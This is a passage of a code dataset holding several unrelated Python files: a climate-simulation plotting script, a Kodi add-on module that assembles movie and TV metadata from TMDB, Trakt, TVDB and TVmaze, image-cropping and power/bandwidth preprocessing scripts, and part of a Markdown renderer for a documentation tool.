[[61,121]], filenames=['plev_pentad'])\nprint('5')\npcent_10, adj_time_10 = sf_spinup('ss_eq_10', [[61,121]], filenames=['plev_pentad'])\nprint('10')\npcent_15, adj_time_15 = sf_spinup('ss_eq_15', [[61,121]], filenames=['plev_pentad'])\nprint('15')\npcent_20, adj_time_20 = sf_spinup('ss_eq_20', [[61,121]], filenames=['plev_pentad'])\nprint('20')\n\n\n# Set figure parameters\nrcParams['figure.figsize'] = 5, 6\nrcParams['font.size'] = 16\n\nfig, (ax1, ax2) = plt.subplots(2)\n\nsst_zs, = ax1.plot(pcent_sst_zs.time-1800., pcent_sst_zs,'y')\nsst, = ax1.plot(pcent_sst.time-1800., pcent_sst,'m')\nm25, = ax1.plot(pcent_2p5.time-1800., pcent_2p5, 'b', label='2.5')\nm5, = ax1.plot(pcent_5.time-1800., pcent_5, 'g', label='5.')\nm10, = ax1.plot(pcent_10.time-1800., pcent_10, 'k', label='10.')\nm15, = ax1.plot(pcent_15.time-1800., pcent_15, 'r', label='15.')\nm20, = ax1.plot(pcent_20.time-1800., pcent_20, 'c', label='20.')\nax1.set_ylabel('Precipitation centroid')\nax1.set_xlabel('Time, days')\nax1.set_xlim([0,1000])\nax1.set_ylim([-2.5,25])\nax1.set_yticks(range(0,26,5))\nax1.grid(True,linestyle=':')\nlegend = 
ax1.legend([m25,m5,m10,m15,m20,sst,sst_zs], ['2.5','5.','10.','15.','20.','SST','SST (ZS)'], loc='lower right', fontsize=8, title='MLD, m', ncol=2) #, ,#bbox_to_anchor=(1.05, 1),\n#legend = ax1.legend([sst,sst_zs], ['SST','SST (ZS)'], loc='lower right', fontsize=8) #, ,#bbox_to_anchor=(1.05, 1),\nlegend.get_title().set_fontsize(8)\n\nmlds = np.array([2.5,5.,10.,15.,20.])\nadj_time_all = np.array([adj_time_2p5, adj_time_5, adj_time_10, adj_time_15, adj_time_20]) - 1800.\n\nA = np.array([ mlds, np.ones(mlds.shape) ])\n\nmodel = sm.OLS(adj_time_all, A.T)\nresult=model.fit()\nconsts = result.params\nstd_err = result.bse\n \nprint('=== Coeffs ===')\nprint(consts[0], consts[1])\nprint('=== Std Errs ===')\nprint(2*std_err[0], 2*std_err[1])\n\nplt.plot(mlds, adj_time_all, 'xk', mew=2, ms=10)\nplt.plot(mlds, mlds * consts[0] + consts[1],'k')\nax2.set_ylabel('Response time, days')\nax2.set_xlabel('Mixed layer depth, m')\nax2.grid(True,linestyle=':')\nax2.set_yticks(range(200,801,200))\n\nplt.subplots_adjust(left=0.15, right=0.95, top=0.95, bottom=0.1, hspace=0.3)\n\nplt.savefig(plot_dir + 'eq_time.pdf', format='pdf')\nplt.close()","sub_path":"paper_2_figs/equm_time.py","file_name":"equm_time.py","file_ext":"py","file_size_in_byte":4490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"227227993","text":"import re\nimport copy\nimport urllib\nimport json\nfrom meta import plugin, import_tmdb, LANG\nfrom meta.navigation.base import get_background_path\nfrom meta.utils.text import parse_year, to_utf8\n\ndef get_movie_metadata(movie, genres_dict=None):\n info = {}\n info['title'] = movie['title']\n info['year'] = parse_year(movie['release_date'])\n info['name'] = u'%s (%s)' % (info['title'], info['year'])\n info['premiered'] = movie['release_date']\n info['rating'] = movie['vote_average']\n info['votes'] = movie['vote_count']\n info['plot'] = movie['overview']\n info['originaltitle'] = movie['original_title']\n info['tmdb'] = str(movie['id'])\n if movie['poster_path'] and movie['poster_path'] != None and movie['poster_path'] != \"\": info['poster'] = u'%s%s' % ('http://image.tmdb.org/t/p/w500', movie['poster_path'])\n else: info['poster'] = \"https://raw.githubusercontent.com/OpenELEQ/Style/master/MetalliQ/default/unavailable.png\"\n if movie['backdrop_path'] and movie['backdrop_path'] != None and movie['backdrop_path'] != \"\": info['fanart'] = u'%s%s' % ('http://image.tmdb.org/t/p/original', movie['backdrop_path'])\n else: info['fanart'] = get_background_path()\n try: info['genre'] = u' / '.join([x['name'] for x in movie['genres']])\n except KeyError:\n if genres_dict: \n try: info['genre'] = u' / '.join([genres_dict[x] for x in movie['genre_ids']])\n except: info['genre'] = ''\n return info\n\ndef get_trakt_movie_metadata(movie, genres_dict=None):\n info = {}\n info['title'] = movie['title']\n info['year'] = movie['year']\n info['name'] = u'%s (%s)' % (info['title'], info['year'])\n info['premiered'] = movie.get('released')\n info['rating'] = movie.get('rating')\n info['votes'] = movie.get('votes')\n info['tagline'] = movie.get('tagline')\n info['plot'] = movie.get('overview')\n info['duration'] = 60 * (movie.get('runtime') or 0)\n info['mpaa'] = movie.get('certification')\n info['playcount'] = movie.get('plays')\n if not info['playcount'] and movie.get('watched'): info['playcount'] = 1\n info['tmdb'] = movie['ids'].get('tmdb')\n info['trakt_id'] = movie['ids'].get('trakt_id')\n info['imdb_id'] = movie['ids'].get('imdb')\n if info['tmdb'] == 
None: info['tmdb'] = \"\"\n if info['trakt_id'] == None: info['trakt_id'] = \"\"\n if info['imdb_id'] == None: info['imdb_id'] = \"\"\n images = item_images(\"movie\", tmdb_id=info['tmdb'], imdb_id=info['imdb_id'], name=info['title'])\n info['poster'] = images[0]\n info['fanart'] = images[1]\n if genres_dict: info['genre'] = u' / '.join([genres_dict[x] for x in movie['genres']])\n if movie.get('trailer'): info['trailer'] = make_trailer(movie['trailer'])\n if not info['playcount'] and movie.get('watched'): info['playcount'] = 1\n return info\n\ndef make_trailer(trailer_url):\n match = re.search('\\?v=(.*)', trailer_url)\n if match: return 'plugin://plugin.video.youtube/?action=play_video&videoid=%s' % (match.group(1))\n\ndef get_tvshow_metadata_trakt(show, genres_dict=None):\n info = {}\n info['title'] = show['title']\n info['year'] = show['year']\n info['name'] = u'%s (%s)' % (info['title'], info['year'])\n info['tvshowtitle'] = info['title']\n info['premiered'] = show.get('released')\n info['rating'] = show.get('rating')\n info['votes'] = show.get('votes')\n info['tagline'] = show.get('tagline')\n info['plot'] = show.get('overview')\n info['duration'] = 60 * (show.get('runtime') or 0)\n info['studio'] = show.get('network','')\n info['mpaa'] = show.get('certification')\n info['playcount'] = show.get('plays')\n if not info['playcount'] and show.get('watched'): info['playcount'] = 1\n info['tmdb'] = show['ids'].get('tmdb')\n info['trakt_id'] = show['ids'].get('trakt_id')\n info['imdb_id'] = show['ids'].get('imdb')\n info['tvdb_id'] = show['ids'].get('tvdb')\n if info['tmdb'] == None: info['tmdb'] = \"\"\n if info['trakt_id'] == None: info['trakt_id'] = \"\"\n if info['imdb_id'] == None: info['imdb_id'] = \"\"\n if info['tvdb_id'] == None: info['tvdb_id'] = \"\"\n images = item_images(\"tv\", tmdb_id=info['tmdb'], imdb_id=info['imdb_id'], tvdb_id=info['tvdb_id'], name=info['title'])\n info['poster'] = images[0]\n info['fanart'] = images[1]\n if genres_dict: info['genre'] = u\" / \".join([genres_dict[x] for x in show['genres']])\n if show.get('trailer'): info['trailer'] = make_trailer(show['trailer'])\n if not info['playcount'] and show.get('watched'): info['playcount'] = 1\n return info\n\ndef get_tvshow_metadata_tvdb(tvdb_show, banners=True):\n info = {}\n if tvdb_show is None: return info\n if tvdb_show['genre']:\n if '|' in tvdb_show['genre']: genres = tvdb_show['genre'].replace('|',' / ')\n info['genre'] = genres[3:-3]\n info['tvdb_id'] = str(tvdb_show['id'])\n info['name'] = tvdb_show['seriesname']\n info['title'] = tvdb_show['seriesname']\n info['tvshowtitle'] = tvdb_show['seriesname']\n info['originaltitle'] = tvdb_show['seriesname']\n info['plot'] = tvdb_show.get('overview', '')\n if banners: info['poster'] = tvdb_show.get_poster(language=LANG)\n info['fanart'] = tvdb_show.get('fanart', '')\n info['rating'] = tvdb_show.get('rating')\n info['votes'] = tvdb_show.get('ratingcount')\n info['year'] = tvdb_show.get('year', 0)\n info['studio'] = tvdb_show.get('network','')\n info['imdb_id'] = tvdb_show.get('imdb_id', '')\n return info\n\ndef get_tvshow_metadata_tmdb(show, genres_dict=None):\n info = {}\n if show is None: return info\n if 'id' in show: info['tmdb'] = str(show['id'])\n info['name'] = show['name']\n info['title'] = show['name']\n info['tvshowtitle'] = show['original_name']\n info['originaltitle'] = show['original_name']\n info['plot'] = show['overview']\n info['rating'] = str(show['vote_average'])\n info['votes'] = str(show['vote_count'])\n try: info['genre'] = u' / 
'.join([x['name'] for x in show['genres']])\n except KeyError:\n if genres_dict:\n try: info['genre'] = u' / '.join([genres_dict[x] for x in show['genre_ids']])\n except: info['genre'] = ''\n if show['poster_path']: info['poster'] = u'%s%s' % ('http://image.tmdb.org/t/p/w500', show['poster_path'])\n else: info['poster'] = \"https://raw.githubusercontent.com/OpenELEQ/Style/master/MetalliQ/default/unavailable.png\"\n if show['backdrop_path']: info['fanart'] = u'%s%s' % ('http://image.tmdb.org/t/p/original', show['backdrop_path'])\n else: info['fanart'] = get_background_path()\n return info\n\ndef get_tvshow_metadata_tvmaze(show):\n info = {}\n if show is None: return info\n if show['externals']['thetvdb'] is not None: info['id'] = show['externals']['thetvdb']\n if show['externals']['imdb'] is not None: info['imdb'] = show['externals']['imdb']\n info['name'] = show['name']\n info['title'] = show['name']\n info['tvshowtitle'] = show['name']\n info['originaltitle'] = show['name']\n info['plot'] = re.sub(r'\\<[^)].*?\\>', '', show['summary']).replace(\"&\",\"&\").replace(\"\\t\",\"\")\n info['rating'] = str(show['rating']['average'])\n info['votes'] = str(show['weight'])\n info['genre'] = show['type']\n if show['image']['original']: info['poster'] = show['image']['original']\n info['fanart'] = get_background_path()\n return info\n\ndef get_season_metadata_tvdb(show_metadata, season, banners=True):\n info = copy.deepcopy(show_metadata)\n del info['title']\n info['season'] = season.num\n if banners: info['poster'] = season.get_poster(language=LANG)\n return info\n\ndef get_season_metadata_tmdb(show_metadata, season):\n info = copy.deepcopy(show_metadata)\n del info['name']\n info['season'] = season['season_number']\n if season['images']['posters']: info['poster'] = season['images']['posters'][0]\n if show_metadata['fanart']: info['fanart'] = show_metadata['fanart']\n else: info['fanart'] = \"\"\n return info\n\ndef get_season_metadata_trakt(show_metadata, season, banners=True):\n info = copy.deepcopy(show_metadata)\n del info['title']\n info['season'] = season['number']\n if not info['playcount'] and season.get('watched'): info['playcount'] = 1\n return info\n\ndef get_season_metadata_tvmaze(show_metadata, season):\n info = copy.deepcopy(show_metadata)\n del info['name']\n info['season'] = season['number']\n info['fanart'] = get_background_path()\n return info\n\ndef get_episode_metadata_tvdb(season_metadata, episode, banners=True):\n info = copy.deepcopy(season_metadata)\n info['episode'] = episode.get('episodenumber')\n info['title'] = episode.get('episodename','')\n info['aired'] = episode.get('firstaired','')\n info['premiered'] = episode.get('firstaired','')\n info['rating'] = episode.get('rating', '')\n info['plot'] = episode.get('overview','')\n info['plotoutline'] = episode.get('overview','')\n info['votes'] = episode.get('ratingcount','')\n if banners: info['poster'] = episode['filename']\n return info\n\ndef get_episode_metadata_tmdb(season_metadata, episode):\n info = copy.deepcopy(season_metadata)\n if episode == None or episode == \"\" or \"status_code\" in str(episode): return info\n info['episode'] = episode['episode_number']\n info['title'] = episode['name']\n info['aired'] = episode['air_date']\n info['premiered'] = episode['air_date']\n info['rating'] = episode['vote_average']\n info['plot'] = episode['overview']\n info['plotoutline'] = episode['overview']\n info['votes'] = episode['vote_count']\n if episode['still_path']: info['poster'] = u'%s%s' % 
('http://image.tmdb.org/t/p/w500', episode['still_path'])\n    elif season_metadata['poster']: info['poster'] = u'%s%s' % ('http://image.tmdb.org/t/p/w500', season_metadata['poster'])\n    else: info['poster'] = ''\n    if season_metadata['fanart']: info['fanart'] = season_metadata['fanart']\n    else: info['fanart'] = ''\n    return info\n\ndef get_episode_metadata_trakt(season_metadata, episode):\n    info = copy.deepcopy(season_metadata)\n    info['episode'] = episode.get('number')\n    info['title'] = episode.get('title','')\n    info['aired'] = episode.get('first_aired','')\n    info['premiered'] = episode.get('first_aired','')\n    info['rating'] = episode.get('rating', '')\n    info['plot'] = episode.get('overview','')\n    info['plotoutline'] = episode.get('overview','')\n    info['votes'] = episode.get('votes','')\n    if not info['playcount'] and episode.get('watched'): info['playcount'] = 1\n    return info\n\ndef get_episode_metadata_tvmaze(season_metadata, episode):\n    info = copy.deepcopy(season_metadata)\n    if episode == None or episode == \"\": return info\n    info['episode'] = episode['number']\n    info['season'] = episode['season']\n    info['title'] = episode['name']\n    info['aired'] = episode['airdate']\n    info['premiered'] = episode['airdate']\n    info['plot'] = re.sub(r'\\<[^)].*?\\>', '', str(episode['summary'])).replace(\"&\",\"&\").replace(\"\\t\",\"\")\n    info['plotoutline'] = re.sub(r'\\<[^)].*?\\>', '', str(episode['summary'])).replace(\"&\",\"&\").replace(\"\\t\",\"\")\n    if episode['image']: info['poster'] = episode['image']['original']\n    info['fanart'] = get_background_path()\n    return info\n\ndef item_images(type, tmdb_id=None, imdb_id=None, tvdb_id=None, name=None):\n    poster = \"\"\n    fanart = \"\"\n    response = \"\"\n    if not tmdb_id and not imdb_id and not tvdb_id and not name: return None\n    if type == \"movie\" and tmdb_id != None and tmdb_id != \"\": response = tmdb.Movies(tmdb_id).info()\n    elif type == \"tv\" and tmdb_id != None and tmdb_id != \"\": response = tmdb.TV(tmdb_id).info()\n    elif type == \"tv\" and tvdb_id != None and tvdb_id != \"\": response = tmdb.Find(tvdb_id).info(external_source=\"imdb_id\")\n    elif imdb_id != None and imdb_id != \"\": response = tmdb.Find(imdb_id).info(external_source=\"imdb_id\")\n    if response == \"\": return False\n    if tmdb_id == None:\n        if type == \"movie\" : response = response.get(\"movie_results\")\n        elif type == \"tv\" : response = response.get(\"tv_results\")\n        elif type == \"season\" : response = response.get(\"season_results\")\n        elif type == \"episode\": response = response.get(\"episode_results\")\n    if isinstance(response, list):\n        # lookups by external id return a list of matches; use the first match if any\n        response = response[0] if response else {}\n    if isinstance(response, dict):\n        if response.get(\"backdrop_path\"): fanart = \"http://image.tmdb.org/t/p/w1280/%s\" % response.get(\"backdrop_path\")\n        else: fanart = \"special://home/addons/script.qlickplay/fanart.jpg\"\n        if response.get(\"poster_path\"): poster = \"http://image.tmdb.org/t/p/w500/%s\" % response.get(\"poster_path\")\n        else: poster = \"special://home/addons/script.qlickplay/icon.png\"\n    images = [poster, fanart]\n    return images 
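# images is [poster, fanart]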
\n","sub_path":"plugin.video.metalliq/resources/lib/meta/info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":13193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"563628854","text":"import matplotlib.image as img\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\nimport scipy.misc as misc\nfrom read_files import read\n\nimages = read() # sedov, quad, bubble, rt\ncropped_imgs = []\nimg_titles = ['compressible', 'compressible_rk', 'compressible_fv4']\npng_names = ['sedov.png', 'sedov_rk.png', 'sedov_fv4.png', 'quad.png', 'quad_rk.png', 'quad_fv4.png', 'bubble.png', 'bubble_rk.png', 'bubble_fv4.png', 'rt.png', 'rt_rk.png', 'rt_fv4.png']\n\nplt.gca().set_axis_off()\nplt.subplots_adjust(top=1, bottom=0, right=1, left=0, hspace=0, wspace=0)\nplt.margins(0,0)\nplt.gca().xaxis.set_major_locator(ticker.NullLocator())\nplt.gca().yaxis.set_major_locator(ticker.NullLocator())\n\nfor list in images[:2]:\n for im in list:\n cropped_im = im[20:450, 160:650, :]\n cropped_imgs.append(cropped_im)\nfor list in images[2:3]:\n for im in list:\n cropped_im = im[20:450, 240:590, :]\n cropped_imgs.append(cropped_im)\nfor list in images[3:]:\n for im in list:\n cropped_im = im[80:390, 50:750, :]\n cropped_imgs.append(cropped_im)\n\nfor n, im in enumerate(cropped_imgs):\n plt.gca().set_axis_off()\n plt.subplots_adjust(top=1, bottom=0, right=1, left=0, hspace=0, wspace=0)\n plt.margins(0,0)\n plt.gca().xaxis.set_major_locator(ticker.NullLocator())\n plt.gca().yaxis.set_major_locator(ticker.NullLocator())#\n plt.imshow(im)\n if n < 6:\n plt.text(245, 3, img_titles[n%3], horizontalalignment='center',\n verticalalignment='top')\n plt.savefig(png_names[n], dpi=90, bbox_inches='tight', pad_inches=0)\n plt.gcf().clear()\n elif n >=6 and n < 9:\n plt.text(175, 3, img_titles[n%3], horizontalalignment='center',\n verticalalignment='top')\n plt.savefig(png_names[n], dpi=90, bbox_inches='tight', pad_inches=0)\n plt.gcf().clear()\n else:\n plt.text(350, 3, img_titles[n%3], horizontalalignment='center',\n verticalalignment='top')\n plt.savefig(png_names[n], dpi=110, bbox_inches='tight', pad_inches=0)\n plt.gcf().clear()\n \n\n#plt.imshow(cropped_imgs[2])\n#plt.savefig('sedov_fv.png', bbox_inches='tight', pad_inches=0)\n#plt.show()\n","sub_path":"changed_files/pngs/crop2.py","file_name":"crop2.py","file_ext":"py","file_size_in_byte":2204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"619115053","text":"\n# coding: utf-8\n\n# In[1]:\n\nimport numpy as np\nimport time\nimport matplotlib.pyplot as plt\nfrom utility import *\nfrom copy import*\n\n\n# In[ ]:\n\n#path_str = \"../../../../Dropbox/project_006/data/boelter_to_kfc/\"\n#path_str = \"../../../../Dropbox/project_006/data/kfc_to_boelter/\"\n#path_str = \"../../../../Dropbox/project_006/data/\"\n#datetime = \"20160502_230328\"\n\n\n# In[ ]:\n\n# the base power consumption 411\n#raw = np.loadtxt(\"../../../../Dropbox/project_006/data/power_base.TXT\", delimiter=',')\n#base_current = [ v[2] for v in raw ]\n#base_power = [ v * 3.7 for v in base_current ]\n#np.mean(base_power), np.std(base_power)\n\n\n# In[2]:\n\ndef preprocess(path_str, datetime, time_unit):\n ''' \n The raw samples are every 0.5 seconds\n Time unit measured in number of samples\n Returns time_unit\n '''\n\n network_record = np.loadtxt(path_str + \"bw_\" + datetime + '.txt', delimiter=',', dtype='str')\n\n rssi = [int(v[1]) for v in network_record]\n bandwidth = [ 0 
if v[4] == '' else float(v[4]) for v in network_record]\n    cellloc = [v[2:3] for v in network_record]\n\n    rssi_cell = []\n    prev_cell = cellloc[0]\n    rc_x = []\n    rc_y = []\n    for i in range(len(rssi)):\n        if cellloc[i] == prev_cell:\n            rc_x.append(i)\n            rc_y.append(rssi[i])\n        else:\n            rssi_cell.append([copy(rc_x), copy(rc_y)])\n            rc_x = [i]\n            rc_y = [rssi[i]]\n            prev_cell = cellloc[i]\n    rssi_cell.append([copy(rc_x), copy(rc_y)])\n\n    # Remove weird points\n    bandwidth = [ bandwidth[i-1] if bandwidth[i] > 1e7 else bandwidth[i] for i in range(len(bandwidth)) ]\n\n    current_record = np.loadtxt(path_str + \"power_\" + datetime + '.TXT', delimiter=',')\n\n    window = 500000\n    prev_time = current_record[0][0]\n    current = []\n    rec_buffer = []\n\n    cnt = 0\n    for rec in current_record:\n        curr_time = rec[0]\n        # deal with cases where multiple records are missing\n        if curr_time - prev_time > window:\n            current_avg = np.mean(rec_buffer)\n            rec_buffer = [rec[2]]\n            while curr_time - prev_time > window:\n                current.append(current_avg)\n                curr_time -= window\n            prev_time = rec[0] - int(curr_time) % int(window)\n            cnt += 1\n        else:\n            rec_buffer += [rec[2]]\n    power = [ i * 3.7 - 411 for i in current ]\n    energy = [ p * 0.5 * 1e-3 for p in power ] \n    \n    # adjust the readings and find the most correlated point. The network is always ahead of \n    max_cor = -1\n    max_idx = 0\n    for i in range(20):\n        maxlen = min(len(bandwidth[i:]), len(energy))\n        cor = np.corrcoef(bandwidth[i:i + maxlen], energy[:maxlen])[0][1]\n        if cor > max_cor:\n            max_cor = cor\n            max_idx = i\n    # use the best-correlated offset, not the last one tried\n    i = max_idx\n    maxlen = min(len(bandwidth[i:]), len(energy))\n    \n    return Network(bandwidth=bandwidth[i:i+maxlen], energy=energy[:maxlen], rssi=rssi[i:i+maxlen], time_unit=time_unit)\n    #return rssi[i:i + maxlen], bandwidth[i:i + maxlen], cellloc[i:i + maxlen], power[:maxlen]\n\n\n# In[3]:\n\npath_str = \"../../../../Dropbox/project_006/data/b2k/\"\ndatetime = \"20160502_223631\"\nnw = preprocess(path_str, datetime, 1.0)\n\n\n# In[ ]:\n\n\n\n","sub_path":"src/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":3191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"645291742","text":"# Run with Python 3\n# Copyright 2019 VMware, Inc.\n# SPDX-License-Identifier: BSD-2-Clause\n\"\"\"\\\nMarkdown with doc:// URI resolution. Part of the Doctor documentation tool.\nNo standalone capability.\n\"\"\"\n# Exit if run other than as a module.\nif __name__ == '__main__':\n    print(__doc__)\n    raise SystemExit(1)\n\n#\n# Standard library imports, in alphabetic order.\n#\n# JSON module. Only used for verbose diagnostic output.\n# https://docs.python.org/3/library/json.html\nimport json\n#\n# File path module.\n# https://docs.python.org/3/library/os.path.html\nimport os.path\n#\n# Regular expressions module.\n# https://docs.python.org/3/library/re.html\nimport re\n#\n# Module for manipulation of the import path.\n# https://docs.python.org/3/library/sys.html#sys.path\nimport sys\n#\n# Local imports\n#\n# Module with Comment Block, to which this module adds Markdown items.\nfrom doctor.comment_block import CommentBlock\n#\n# Module with a handy RE access utility.\nfrom doctor.comment_line import CommentLine\n#\n# Module for Markdown semantic items.\nfrom doctor.markdown import BlockType, SpanType, MarkdownItem\n#\n# Markdown parser module.\n# https://github.com/lepture/mistune\nimport mistune\n# Sorry, you have to ensure that your local copy of the mistune repository has\n# been added to sys.path before importing the doctor package. 
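Typically that is a sys.path.append (or sys.path.insert) of the mistune checkout directory.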
There is a\n# subroutine to do that in the doctor.py script.\n\n# The DocResolver is in its own class to keep the mistune.Renderer subclass\n# tidy. It only has class constants and class methods.\nclass DocResolver:\n blockContain = {\n BlockType.PARAGRAPH.name: {\n 'can': tuple(SpanType),\n 'cannot': tuple(BlockType)\n },\n BlockType.HEADER.name: {\n 'can': tuple(SpanType),\n 'cannot': tuple(BlockType)\n },\n BlockType.LIST_ITEM.name: {\n 'can': tuple(SpanType) + (BlockType.LIST, BlockType.PARAGRAPH),\n 'cannot': (BlockType.LIST_ITEM,)\n }\n }\n \n # Constant regular expressions get compiled here. See CommentLine class for\n # short discussion.\n #\n # Following syntax elements are used:\n #\n # - Python r'...' for raw strings that don't get backslash expansion.\n # - (?:...) for non-capture group.\n # - \\s matches end-of-line characters, because they are whitespace.\n # \\s+ requires at least one, which means that it doesn't match at the\n # very start of a string, which is what's wanted here.\n # - Caret in a capture group doesn't capture the newline characters, and\n # dollar doesn't either if they precede the pattern.\n # - Python string continuation, some having comments in between.\n #\n # Next pattern is used to split a text with embedded at commands.\n atPattern = re.compile(\n r'\\s+(^@(?:'\n r'returns?' # \"return\" or \"returns\".\n r'|' # Alternate matches separated by pipe character.\n r'param'\n r'|'\n r'brief'\n r'|'\n r'description'\n r'|'\n r'details'\n r'|'\n r'version'\n r'))', re.MULTILINE)\n\n @classmethod\n def can_contain(cls, blockType, markdownItem):\n try:\n if markdownItem.type in cls.blockContain[blockType.name]['can']:\n return True\n if markdownItem.type in cls.blockContain[blockType.name]['cannot']:\n return False\n except Exception as exception:\n raise exception.__class__(\n 'Block contain configuration incomplete for {} and {}.'.format(\n blockType.name, markdownItem.type.name)) from exception\n \n raise AssertionError(\n \"Don't know if {} can or cannot contain {}.\".format(\n blockType.name, markdownItem))\n\n @classmethod\n def resolve_all_doc_uri(cls, blockType, text, custom=None):\n output = []\n outputTail = None\n for child in text:\n if child.blockType is BlockType.DOC_URI:\n for grandchild in child.contents:\n if cls.can_contain(blockType, grandchild):\n if outputTail is None:\n outputTail = []\n outputTail.append(grandchild)\n else:\n if outputTail is not None:\n output.append(MarkdownItem(\n blockType, None, outputTail, custom))\n outputTail = None\n output.append(grandchild)\n else:\n if outputTail is None:\n outputTail = []\n outputTail.append(child)\n \n if outputTail is not None:\n output.append(MarkdownItem(blockType, None, outputTail, custom))\n \n return output\n \n @classmethod\n def process_at_commands(cls, iterator):\n \"\"\"\\\n Take an iterator of paragraphs and split each to ensure that any\n at-commands are at the start of a paragraph. 
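For example, a text item containing a newline followed by '@param' or '@return' is split so that the at-command opens a new paragraph.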
Also:\n \n - Join adjacent texts, to prevent wrong handling of parameter names\n with embedded _ characters later.\n - Strip leading whitespace from every line after the first in each\n paragraph.\n \"\"\"\n # Splitting is necessary if there is an embedded newline-at in a text\n # item that is a direct child of the paragraph.\n\n for paragraph in iterator:\n \n # Don't attempt to resolve at commands in code blocks.\n if paragraph.blockType is BlockType.BLOCK_CODE:\n yield paragraph\n continue\n # Unresolved at this time is that non-paragraphs sometimes come\n # through here, like lists also come through here. It seems to be OK\n # though, because those could have at commands that need to be\n # resolved.\n\n # Start a list of Markdown items that will become child items in the\n # yielded paragraphs.\n contents = []\n\n for span in cls.consolidate_texts(paragraph.contents):\n if span.spanType is not SpanType.TEXT:\n contents.append(span)\n continue\n\n if not isinstance(span.contents, str):\n raise AssertionError(\n \"Text in paragraph contents aren't str.\")\n \n # The following returns a list with an odd number of items,\n # because the pattern has a capture group.\n splits = re.split(cls.atPattern, \"\".join(tuple(\n # Strip any leading whitespace from lines after the first.\n (line if lineIndex <= 0 else line.lstrip())\n for lineIndex, line in enumerate(\n span.contents.splitlines(True))\n )))\n\n # Following lines are handy to check what's coming out of the re\n # split.\n # for index, split in enumerate(splits):\n # print('{:>02d} \"{}\"'.format(index, split))\n\n # Note that splits never has an even number of items. If splits\n # has one item, this loop runs zero times.\n for splitIndex in range(0, len(splits) - 2, 2):\n if not(splits[splitIndex] == \"\" and splitIndex == 0):\n contents.append(MarkdownItem(\n None, SpanType.TEXT\n , splits[splitIndex] if splitIndex <= 0\n else ''.join(splits[splitIndex - 1: splitIndex + 1])\n ))\n yield MarkdownItem(\n paragraph.blockType, None, contents, paragraph.custom)\n contents = []\n \n # Sweep up the items that weren't processed by the loop, either\n # one or two items.\n contents.append(MarkdownItem(\n None, SpanType.TEXT, ''.join(splits[-2:])))\n \n yield MarkdownItem(\n paragraph.blockType, None, contents, paragraph.custom)\n \n @classmethod\n def consolidate_texts(cls, iterator):\n pending = None\n contents = None\n \n for span in iterator:\n if not isinstance(span, MarkdownItem):\n raise AssertionError(\"Item in text consolidation isn't\"\n \" MarkdownItem: {}\".format(type(span)))\n \n if span.spanType is SpanType.TEXT:\n if contents is None and pending is None:\n pending = span\n else:\n if contents is None:\n contents = []\n if pending is not None:\n contents.append(pending.contents)\n pending = None\n contents.append(span.contents)\n else:\n if pending is not None:\n yield pending\n pending = None\n if contents is not None:\n yield MarkdownItem(None, SpanType.TEXT, ''.join(contents))\n contents = None\n yield span\n \n if pending is not None:\n yield pending\n pending = None\n if contents is not None:\n yield MarkdownItem(None, SpanType.TEXT, ''.join(contents))\n contents = None\n\nclass DocRenderer(mistune.Renderer):\n \n docPath = None\n \n def __init__(self, docGetter, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.verbose = False\n self.docGetter = docGetter\n \n def doc_uri(self, groups):\n name, uri = CommentLine.group_startswith(groups, 'doc')\n if self.verbose:\n print('DocRenderer doc_uri', groups, name)\n \n 
contentLines = self.docGetter.get_content(uri, self.docPath)\n content = ''.join(contentLines)\n if content == \"\":\n return []\n\n markdownItems = MarkdownParser(self.docGetter).get_markdown_items(\n self.docPath, content)\n\n # If len(contentLines) is 1 then destructure the markdown() return\n # value, i.e. remove the paragraph layer.\n if len(contentLines) == 1:\n if markdownItems[0].type is BlockType.PARAGRAPH:\n markdownItems = markdownItems[0].contents\n else:\n raise NotImplementedError()\n\n return [MarkdownItem(BlockType.DOC_URI, None ,markdownItems)]\n\n #\n # Block item overrides.\n #\n # Same order as here: https://github.com/lepture/mistune#block-level\n def block_code(self, code, language=None):\n if self.verbose:\n print('DocRenderer block_code(,{},{})'.format(code, language))\n return [MarkdownItem(BlockType.BLOCK_CODE, None, code)]\n\n def block_quote(self, text):\n raise NotImplementedError()\n def block_html(self, html):\n raise NotImplementedError()\n\n def header(self, text, level, raw=None):\n if self.verbose:\n print('DocRenderer header(,{},{},{})'.format(text, level, raw))\n return DocResolver.resolve_all_doc_uri(\n BlockType.HEADER, text, {'level': level})\n \n def hrule(self):\n raise NotImplementedError()\n\n def list(self, body, ordered=True):\n if self.verbose:\n print('DocRenderer list(,\\n{}\\n,{})'.format(body, ordered))\n return DocResolver.resolve_all_doc_uri(\n BlockType.LIST, body, {'ordered': ordered})\n\n def list_item(self, text):\n if self.verbose:\n print('DocRenderer list_item(,{})'.format(text))\n return DocResolver.resolve_all_doc_uri(BlockType.LIST_ITEM, text)\n\n def paragraph(self, text):\n resolved = DocResolver.resolve_all_doc_uri(BlockType.PARAGRAPH, text)\n outputs = [output\n for output in DocResolver.process_at_commands(resolved)]\n if self.verbose:\n def json_dump(iterator, indent=4):\n return json.dumps(tuple(\n item.asTuple() for item in iterator), indent=4)\n print('DocRenderer paragraph(,\\n{})\\nresolved{}\\noutputs{}'.format(\n text, json_dump(resolved), json_dump(outputs)))\n return outputs\n\n def table(self, header, body):\n raise NotImplementedError()\n def table_row(self, content):\n raise NotImplementedError()\n def table_cell(self, content, **flags):\n raise NotImplementedError()\n \n #\n # Span item overrides.\n #\n # Same order as here: https://github.com/lepture/mistune#span-level\n def autolink(self, link, is_email=False):\n if self.verbose:\n print('DocRenderer autolink(,{},{})'.format(link, is_email))\n return [MarkdownItem(None, SpanType.AUTOLINK, link)]\n def codespan(self, text):\n if self.verbose:\n print('DocRenderer codespan(,\\n{})'.format(text))\n return [MarkdownItem(None, SpanType.CODESPAN, text)]\n def double_emphasis(self, text):\n if self.verbose:\n print('DocRenderer double_emphasis(,\\n{})'.format(text))\n return [MarkdownItem(None, SpanType.DOUBLE_EMPHASIS, text)]\n def emphasis(self, text):\n if self.verbose:\n print('DocRenderer 